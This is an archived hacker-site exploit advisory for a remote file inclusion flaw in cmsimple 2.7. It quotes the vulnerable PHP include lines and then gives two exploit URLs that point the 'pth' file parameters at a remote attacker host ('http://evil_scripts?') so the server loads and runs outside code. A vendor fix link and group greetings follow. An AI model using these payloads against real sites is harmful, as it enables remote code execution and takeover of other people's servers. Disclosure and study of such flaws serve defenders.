AOH :: Web :: CMS / Portals

AOH :: Web :: CMS / Portals :: C07-2009.HTM
cmsimple 2.7 Remote File Include

cmsimple 2.7 Remote File Include cmsimple 2.7 Remote File Include


-----------------------------------------------

cmsimple 2.7  Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

if (!@ include ($pth['file']['plugin_index']))
=09


{if(@include($pth['file']['image']))exit;}




-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts? 


cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts? 

-----------------------------------------------

download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip 

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa


SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team


                 
##################################

AsB-MaY.NeT  & MoHaNdKo.CoM

##################################


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.